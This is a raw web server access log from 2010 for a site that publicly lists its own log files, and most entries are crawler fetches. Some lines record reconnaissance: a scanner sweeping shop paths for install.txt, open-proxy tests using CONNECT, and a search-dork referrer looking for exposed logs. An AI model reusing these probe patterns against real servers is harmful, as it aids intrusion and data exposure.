75.101.197.161 - - [28/Feb/2010:03:02:36 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )"
75.101.197.161 - - [28/Feb/2010:03:02:36 -0800] "GET /?C=S;O=A HTTP/1.1" 200 5981 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )"
66.249.68.183 - - [28/Feb/2010:03:28:15 -0800] "GET /clownjuice-error.log HTTP/1.1" 200 49959 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.183 - - [28/Feb/2010:03:52:52 -0800] "GET /clownjuice-access.log HTTP/1.1" 200 106532 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
93.158.148.31 - - [28/Feb/2010:03:58:42 -0800] "GET /log-error.log HTTP/1.1" 200 140483 "-" "Yandex/1.01.001 (compatible; Win16; I)"
67.218.116.162 - - [28/Feb/2010:04:26:18 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
96.31.166.228 - - [28/Feb/2010:04:36:33 -0800] "GET / HTTP/1.1" 200 5981 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
93.158.148.31 - - [28/Feb/2010:05:31:56 -0800] "GET /orbsucks-access.log HTTP/1.1" 200 373600 "-" "Yandex/1.01.001 (compatible; Win16; I)"
93.158.148.31 - - [28/Feb/2010:06:18:31 -0800] "GET /?C=D;O=D HTTP/1.1" 200 5981 "-" "Yandex/1.01.001 (compatible; Win16; I)"
98.165.44.141 - - [28/Feb/2010:06:22:00 -0800] "GET /clownjuice-access.log HTTP/1.1" 200 106665 "http://www.google.com/url?sa=t&source=web&ct=res&cd=5&ved=0CBQQFjAE&url=http%3A%2F%2Funusualdischarge.com%2Fclownjuice-access.log&rct=j&q=67.202.0.47&ei=vXuKS-zeNoLstQP475GGAw&usg=AFQjCNFNmPABSVP9pGjPuq8_u6gu-pXVcA" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3; MSN Optimized;US)"
66.249.68.203 - - [28/Feb/2010:09:35:51 -0800] "GET /robots.txt HTTP/1.1" 302 359 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.203 - - [28/Feb/2010:09:35:51 -0800] "GET /log.20080919/jeremykm-error.log HTTP/1.1" 302 359 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
88.171.243.5 - - [28/Feb/2010:09:41:16 -0800] "GET /favicon.ico HTTP/1.1" 302 360 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)"
174.133.7.18 - - [28/Feb/2010:10:19:08 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; ru; rv:1.8.0.10) Gecko/20070216 Firefox/1.5.0.10"
79.243.61.39 - - [28/Feb/2010:11:05:53 -0800] "GET /ferality-error.log HTTP/1.1" 200 46178 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM; .NET CLR 2.0.50727)"
216.129.119.12 - - [28/Feb/2010:11:07:50 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
66.249.68.183 - - [28/Feb/2010:12:37:14 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.183 - - [28/Feb/2010:12:37:14 -0800] "GET /ferality-error.log HTTP/1.1" 200 46178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.195.165.34 - - [28/Feb/2010:12:51:09 -0800] "GET HTTP/1.1 HTTP/1.1" 400 373 "-" "Toata dragostea mea pentru diavola"
209.195.165.34 - - [28/Feb/2010:12:51:09 -0800] "GET /install.txt HTTP/1.1" 302 355 "-" "Toata dragostea mea pentru diavola"
209.195.165.34 - - [28/Feb/2010:12:51:09 -0800] "GET /cart/install.txt HTTP/1.1" 302 355 "-" "Toata dragostea mea pentru diavola"
209.195.165.34 - - [28/Feb/2010:12:51:10 -0800] "GET /zencart/install.txt HTTP/1.1" 302 355 "-" "Toata dragostea mea pentru diavola"
209.195.165.34 - - [28/Feb/2010:12:51:13 -0800] "GET /zen/install.txt HTTP/1.1" 302 355 "-" "Toata dragostea mea pentru diavola"
209.195.165.34 - - [28/Feb/2010:12:51:13 -0800] "GET /shop/install.txt HTTP/1.1" 302 355 "-" "Toata dragostea mea pentru diavola"
209.195.165.34 - - [28/Feb/2010:12:51:14 -0800] "GET /butik/install.txt HTTP/1.1" 302 355 "-" "Toata dragostea mea pentru diavola"
209.195.165.34 - - [28/Feb/2010:12:51:15 -0800] "GET /zcart/install.txt HTTP/1.1" 302 355 "-" "Toata dragostea mea pentru diavola"
209.195.165.34 - - [28/Feb/2010:12:51:15 -0800] "GET /shop2/install.txt HTTP/1.1" 302 355 "-" "Toata dragostea mea pentru diavola"
209.195.165.34 - - [28/Feb/2010:12:51:15 -0800] "GET /catalog/install.txt HTTP/1.1" 302 355 "-" "Toata dragostea mea pentru diavola"
209.195.165.34 - - [28/Feb/2010:12:51:16 -0800] "GET /boutique/install.txt HTTP/1.1" 302 355 "-" "Toata dragostea mea pentru diavola"
209.195.165.34 - - [28/Feb/2010:12:51:16 -0800] "GET /cart/install.txt HTTP/1.1" 302 355 "-" "Toata dragostea mea pentru diavola"
209.195.165.34 - - [28/Feb/2010:12:51:16 -0800] "GET /store/install.txt HTTP/1.1" 302 355 "-" "Toata dragostea mea pentru diavola"
93.158.148.31 - - [28/Feb/2010:13:50:29 -0800] "GET /gorgeworld-error.log HTTP/1.1" 200 28635 "-" "Yandex/1.01.001 (compatible; Win16; I)"
66.249.68.203 - - [28/Feb/2010:13:55:07 -0800] "GET /log.20080919/jeremykm-error.log HTTP/1.1" 302 359 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
93.158.148.31 - - [28/Feb/2010:14:59:29 -0800] "GET /dustinharley-error.log HTTP/1.1" 200 45856 "-" "Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.231 - - [28/Feb/2010:15:33:08 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.159.206.159 - - [28/Feb/2010:15:37:38 -0800] "GET /browserbomb-access.log HTTP/1.1" 200 - "-" "libwww-perl/5.826"
207.46.204.231 - - [28/Feb/2010:15:38:24 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.159.206.159 - - [28/Feb/2010:15:42:51 -0800] "GET /browserbomb-access.log HTTP/1.0" 200 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.203 - - [28/Feb/2010:15:46:16 -0800] "GET /robots.txt HTTP/1.1" 302 359 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.203 - - [28/Feb/2010:15:46:16 -0800] "GET /log.20080919/jeremykm-error.log HTTP/1.1" 302 359 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.46.204.231 - - [28/Feb/2010:15:48:14 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.88.124.30 - - [28/Feb/2010:16:01:58 -0800] "GET http://www.yahoo.com/ HTTP/1.1" 200 5974 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)"
207.46.204.231 - - [28/Feb/2010:16:01:59 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
93.158.148.31 - - [28/Feb/2010:16:08:29 -0800] "GET /jasoncmartin-error.log HTTP/1.1" 200 195419 "-" "Yandex/1.01.001 (compatible; Win16; I)"
68.199.133.22 - - [28/Feb/2010:16:12:03 -0800] "GET /clownjuice-access.log HTTP/1.1" 200 107161 "http://www.bing.com/search?q=87.118.81.107/&src=IE-Address" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
207.46.204.231 - - [28/Feb/2010:16:18:12 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.231 - - [28/Feb/2010:16:39:09 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.231 - - [28/Feb/2010:17:03:19 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
93.158.148.31 - - [28/Feb/2010:17:17:30 -0800] "GET /sharkbomb-error.log HTTP/1.1" 200 14270 "-" "Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.231 - - [28/Feb/2010:17:32:38 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
93.158.148.31 - - [28/Feb/2010:17:38:08 -0800] "GET /?C=M;O=D HTTP/1.1" 200 5981 "-" "Yandex/1.01.001 (compatible; Win16; I)"
93.158.148.31 - - [28/Feb/2010:17:38:11 -0800] "GET /evilfuckers-access.log HTTP/1.1" 200 133789 "-" "Yandex/1.01.001 (compatible; Win16; I)"
123.125.66.23 - - [28/Feb/2010:17:47:50 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
66.249.67.71 - - [28/Feb/2010:18:03:32 -0800] "GET /robots.txt HTTP/1.1" 302 359 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.71 - - [28/Feb/2010:18:03:32 -0800] "GET / HTTP/1.1" 200 5980 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.46.204.231 - - [28/Feb/2010:18:05:04 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.249.68.203 - - [28/Feb/2010:18:26:14 -0800] "GET /log.20080919/jeremykm-error.log HTTP/1.1" 302 359 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.46.204.231 - - [28/Feb/2010:18:41:30 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.241.227.78 - - [28/Feb/2010:18:55:22 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "ia_archiver-web.archive.org"
117.63.178.70 - - [28/Feb/2010:18:55:22 -0800] "GET /sitemap.xml HTTP/1.1" 302 360 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2) Gecko/20100115 Firefox/3.6 GTBDFff GTB7.0"
208.80.193.33 - - [28/Feb/2010:18:59:01 -0800] "GET / HTTP/1.0" 200 5981 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Comcast; InfoPath.1; Comcast)"
93.158.148.31 - - [28/Feb/2010:19:07:55 -0800] "GET /paxnihilo-access.log HTTP/1.1" 200 11821 "-" "Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.231 - - [28/Feb/2010:19:23:11 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
202.45.83.6 - - [28/Feb/2010:19:47:47 -0800] "GET /paxnihilo-access.log HTTP/1.1" 200 11821 "http://www.google.com.hk/search?hl=zh-TW&source=hp&q=iphone+version+1A543a&meta=&aq=f&oq=" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)"
202.45.83.6 - - [28/Feb/2010:19:47:48 -0800] "GET /favicon.ico HTTP/1.1" 302 360 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)"
67.195.114.214 - - [28/Feb/2010:19:48:33 -0800] "GET /robots.txt HTTP/1.0" 302 360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.114.214 - - [28/Feb/2010:19:48:34 -0800] "GET /index.php/photos/album/1/photo/2.html HTTP/1.0" 302 360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.67.166 - - [28/Feb/2010:20:05:03 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.166 - - [28/Feb/2010:20:05:03 -0800] "GET /paxnihilo-error.log HTTP/1.1" 200 3008 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.46.204.231 - - [28/Feb/2010:20:08:24 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.231 - - [28/Feb/2010:20:09:12 -0800] "GET /clownjuice-error.log HTTP/1.1" 200 50284 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.249.68.183 - - [28/Feb/2010:20:29:18 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.183 - - [28/Feb/2010:20:29:19 -0800] "GET /gorgeworld-access.log HTTP/1.1" 200 97870 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
93.158.148.31 - - [28/Feb/2010:20:37:34 -0800] "GET /evilfuckers-error.log HTTP/1.1" 200 39779 "-" "Yandex/1.01.001 (compatible; Win16; I)"
194.109.21.230 - - [28/Feb/2010:21:42:28 -0800] "CONNECT 194.109.153.5:11111 HTTP/1.0" 405 373 "-" "-"
194.109.21.230 - - [28/Feb/2010:21:42:28 -0800] "GET http://194.109.153.3/proxycheck.txt HTTP/1.0" 302 353 "-" "BOPM/3.1.3"
194.109.21.230 - - [28/Feb/2010:21:42:35 -0800] "POST http://194.109.153.5:11111/ HTTP/1.0" 302 356 "-" "-"
93.158.148.31 - - [28/Feb/2010:22:07:14 -0800] "GET /?C=N;O=D HTTP/1.1" 200 5981 "-" "Yandex/1.01.001 (compatible; Win16; I)"
93.158.148.31 - - [28/Feb/2010:23:36:52 -0800] "GET /clownjuice-error.log HTTP/1.1" 200 50284 "-" "Yandex/1.01.001 (compatible; Win16; I)"
204.15.39.12 - - [01/Mar/2010:00:07:56 -0800] "HEAD / HTTP/1.1" 200 - "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:07:57 -0800] "GET / HTTP/1.1" 206 5981 "-" "Botslist Botfinder (+http://www.botslist.ca)"
66.249.68.183 - - [01/Mar/2010:00:08:06 -0800] "GET /paxnihilo-error.log HTTP/1.1" 200 3008 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
204.15.39.12 - - [01/Mar/2010:00:08:11 -0800] "HEAD /browserbomb-access.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:08:12 -0800] "HEAD /browserbomb-error.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:08:12 -0800] "HEAD /clownjuice-access.log HTTP/1.1" 206 - "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:08:13 -0800] "GET /clownjuice-access.log HTTP/1.1" 206 107614 "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:08:15 -0800] "HEAD /clownjuice-error.log HTTP/1.1" 206 - "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:08:16 -0800] "GET /clownjuice-error.log HTTP/1.1" 206 50394 "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:08:17 -0800] "HEAD /dustinharley-access.log HTTP/1.1" 206 - "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:08:18 -0800] "GET /dustinharley-access.log HTTP/1.1" 206 403542 "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:08:24 -0800] "HEAD /dustinharley-error.log HTTP/1.1" 206 - "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:08:24 -0800] "GET /dustinharley-error.log HTTP/1.1" 206 45856 "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:08:26 -0800] "HEAD /evilfuckers-access.log HTTP/1.1" 206 - "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:08:26 -0800] "GET /evilfuckers-access.log HTTP/1.1" 206 134063 "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:08:31 -0800] "HEAD /evilfuckers-error.log HTTP/1.1" 206 - "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:08:31 -0800] "GET /evilfuckers-error.log HTTP/1.1" 206 39890 "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:08:33 -0800] "HEAD /ferality-access.log HTTP/1.1" 206 - "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:08:33 -0800] "GET /ferality-access.log HTTP/1.1" 206 610233 "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:08:43 -0800] "HEAD /ferality-error.log HTTP/1.1" 206 - "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:08:44 -0800] "GET /ferality-error.log HTTP/1.1" 206 46826 "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:08:46 -0800] "HEAD /gorgeworld-access.log HTTP/1.1" 206 - "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:08:49 -0800] "GET /gorgeworld-access.log HTTP/1.1" 206 98369 "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:08:52 -0800] "HEAD /gorgeworld-error.log HTTP/1.1" 206 - "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:08:52 -0800] "GET /gorgeworld-error.log HTTP/1.1" 206 28745 "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:08:54 -0800] "HEAD /jasoncmartin-access.log HTTP/1.1" 206 - "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:08:54 -0800] "GET /jasoncmartin-access.log HTTP/1.1" 206 517207 "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:09:04 -0800] "HEAD /jasoncmartin-error.log HTTP/1.1" 206 - "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:09:05 -0800] "GET /jasoncmartin-error.log HTTP/1.1" 206 196401 "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:09:10 -0800] "HEAD /log-access.log HTTP/1.1" 206 - "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:09:10 -0800] "GET /log-access.log HTTP/1.1" 206 389625 "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:09:24 -0800] "HEAD /log-error.log HTTP/1.1" 206 - "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:09:25 -0800] "GET /log-error.log HTTP/1.1" 206 145594 "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:09:31 -0800] "HEAD /orbsucks-access.log HTTP/1.1" 206 - "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:09:32 -0800] "GET /orbsucks-access.log HTTP/1.1" 206 380812 "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:09:39 -0800] "HEAD /orbsucks-error.log HTTP/1.1" 206 - "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:09:40 -0800] "GET /orbsucks-error.log HTTP/1.1" 206 59844 "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:09:42 -0800] "HEAD /paxnihilo-access.log HTTP/1.1" 206 - "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:09:42 -0800] "GET /paxnihilo-access.log HTTP/1.1" 206 11821 "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:09:43 -0800] "HEAD /paxnihilo-error.log HTTP/1.1" 206 - "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:09:44 -0800] "GET /paxnihilo-error.log HTTP/1.1" 206 3008 "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:09:45 -0800] "HEAD /sharkbomb-access.log HTTP/1.1" 206 - "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:09:45 -0800] "GET /sharkbomb-access.log HTTP/1.1" 206 319829 "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:09:52 -0800] "HEAD /sharkbomb-error.log HTTP/1.1" 206 - "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:09:53 -0800] "GET /sharkbomb-error.log HTTP/1.1" 206 14476 "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:09:54 -0800] "HEAD /terhanian-access.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:09:55 -0800] "HEAD /terhanian-error.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:09:55 -0800] "HEAD /vaginacide-access.log HTTP/1.1" 206 - "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:09:56 -0800] "GET /vaginacide-access.log HTTP/1.1" 206 14187 "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:09:58 -0800] "HEAD /vaginacide-error.log HTTP/1.1" 206 - "-" "Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [01/Mar/2010:00:09:58 -0800] "GET /vaginacide-error.log HTTP/1.1" 206 4282 "-" "Botslist Botfinder (+http://www.botslist.ca)"
93.158.148.31 - - [01/Mar/2010:01:06:32 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "Yandex/1.01.001 (compatible; Win16; I)"
93.158.148.31 - - [01/Mar/2010:01:06:49 -0800] "GET /paxnihilo-error.log HTTP/1.1" 200 3008 "-" "Yandex/1.01.001 (compatible; Win16; I)"
66.249.68.183 - - [01/Mar/2010:02:09:43 -0800] "GET /sharkbomb-error.log HTTP/1.1" 200 14579 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
173.45.105.138 - - [01/Mar/2010:02:36:28 -0800] "GET /ferality-access.log HTTP/1.1" 200 610834 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6"
93.158.148.31 - - [01/Mar/2010:03:06:14 -0800] "GET /vaginacide-error.log HTTP/1.1" 200 4282 "-" "Yandex/1.01.001 (compatible; Win16; I)"
66.249.68.183 - - [01/Mar/2010:04:11:31 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.183 - - [01/Mar/2010:04:11:31 -0800] "GET /evilfuckers-error.log HTTP/1.1" 200 39890 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.169 - - [01/Mar/2010:04:23:56 -0800] "GET /clownjuice-access.log HTTP/1.1" 200 108138 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.218.116.162 - - [01/Mar/2010:04:27:00 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
93.158.148.31 - - [01/Mar/2010:05:05:37 -0800] "GET /clownjuice-access.log HTTP/1.1" 200 108138 "-" "Yandex/1.01.001 (compatible; Win16; I)"
93.158.148.31 - - [01/Mar/2010:06:05:20 -0800] "GET /?C=S;O=D HTTP/1.1" 200 5981 "-" "Yandex/1.01.001 (compatible; Win16; I)"
66.249.68.183 - - [01/Mar/2010:06:13:10 -0800] "GET /ferality-error.log HTTP/1.1" 200 47083 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
204.15.39.12 - - [01/Mar/2010:07:34:43 -0800] "HEAD /unsanitary-access.log HTTP/1.1" 302 - "-" "Botslist Botfinder (+http://www.botslist.ca)"
67.218.116.162 - - [01/Mar/2010:07:42:17 -0800] "GET /vaginacide-access.log HTTP/1.1" 200 14187 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
81.88.124.30 - - [01/Mar/2010:07:47:02 -0800] "CONNECT 64.12.202.1:443 HTTP/1.0" 405 369 "-" "-"
81.88.124.30 - - [01/Mar/2010:07:48:21 -0800] "CONNECT 64.12.202.8:443 HTTP/1.0" 405 369 "-" "-"
93.197.5.251 - - [01/Mar/2010:08:00:25 -0800] "GET /sitemap.xml HTTP/1.1" 302 360 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB6"
207.241.227.93 - - [01/Mar/2010:08:00:27 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "ia_archiver-web.archive.org"
66.249.68.203 - - [01/Mar/2010:08:15:03 -0800] "GET /robots.txt HTTP/1.1" 302 359 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.203 - - [01/Mar/2010:08:15:03 -0800] "GET /vaginacide-error.log HTTP/1.1" 200 4282 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.203 - - [01/Mar/2010:10:16:02 -0800] "GET /log.20081203/allthisforadollar-error.log HTTP/1.1" 302 359 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.129.119.12 - - [01/Mar/2010:11:03:56 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
64.56.65.218 - - [01/Mar/2010:11:21:41 -0800] "GET /robots.txt HTTP/1.0" 302 360 "http://unusualdischarge.com/robots.txt" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
64.56.65.218 - - [01/Mar/2010:11:21:41 -0800] "GET / HTTP/1.0" 200 5981 "http://unusualdischarge.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
82.236.239.55 - - [01/Mar/2010:11:28:53 -0800] "GET / HTTP/1.1" 200 5981 "http://www.google.fr/search?hl=fr&client=firefox-a&rls=org.mozilla%3Afr%3Aofficial&q=access.Log+2010+intitle%3A%22index+of+%2F%22&btnG=Rechercher&meta=&aq=f&oq=" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)"
82.236.239.55 - - [01/Mar/2010:11:28:54 -0800] "GET /icons/text.gif HTTP/1.1" 200 229 "http://unusualdischarge.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)"
82.236.239.55 - - [01/Mar/2010:11:28:54 -0800] "GET /icons/blank.gif HTTP/1.1" 200 148 "http://unusualdischarge.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)"
